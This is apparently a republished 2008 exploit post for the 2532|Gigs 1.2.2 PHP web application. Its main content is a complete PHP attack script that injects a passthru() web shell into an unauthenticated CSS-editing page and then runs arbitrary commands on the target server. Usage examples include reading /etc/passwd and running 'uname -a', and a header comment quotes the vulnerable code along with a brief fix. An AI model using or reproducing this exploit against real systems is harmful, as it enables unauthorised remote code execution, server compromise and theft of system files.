2532Gigs 1.2.2 Stable Remote Command Execution Exploit
|
来源:staker[at]hotmail[dot]it 作者:athos 发布时间:2008-12-19
|
|
<?php
/* ---------------------------------------------------------------- * 2532|Gigs 1.2.2 Stable Remote Command Execution Exploit * ---------------------------------------------------------------- * by athos - staker[at]hotmail[dot]it * works regardless php.ini settings * http://www.hotscripts.com/jump.php?listing_id=65863&jump_type=1 * ---------------------------------------------------------------- * Code Details (calcss_edit.php) * * 1. <?php * 2. ... * 12. sleep(2); * 13. $id = $_POST["id"]; * 14. $content = $_POST["content"]; * 15. //lets write the updated CSS file * 16. $filename = "css/calendar.css"; * 17. $theText = stripslashes($content); * 18. $data = fopen($filename, "w"); * 19. fwrite($data,$content); * 20. fclose($data); * 21. // display the new css file * 22. include("css/calendar.css"); * 23 ?> * ---------------------------------------------------------------- * Fix * * <?php * * if(eregi('calcss_edit.php',$_SERVER['PHP-SELF'])) * { * die("Access Not Allowed"); * } * * ... * ?> * */
error_reporting(0);
$host = explode('/',$argv[1]); $exec = $argv[2] or usage();
$sock = fsockopen($host[0],80);
$post = "content=<?php passthru('{$exec}');?>"; $leng = strlen($post);
$data = "POST /{$host[1]}/calcss_edit.php HTTP/1.1\r\n". "Host: {$host[0]}\r\n". "User-Agent: Lynx (textmode)\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "Accept-Encoding: text/plain\r\n". "Content-Length: {$leng}\r\n\r\n{$post}\r\n\r\n";
fputs($sock,$data);
while(!feof($sock)) { $html .= fgets($sock); } fclose($sock);
echo $html;
function usage() {
print_r(' ------------------------------------------------------- 2532|Gigs 1.2.2 Stable Remote Command Execution Exploit ------------------------------------------------------- by athos - staker[at]hotmail[dot]it works regardless php.ini settings
Usage: php xpl.php [host/path] [command] php xpl.php localhost/cms cat ../../../etc/passwd php xpl.php localhost/cms "uname -a" '); exit(0);
}
?>
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
|
|
|
|
推荐广告 |
|
|
|
|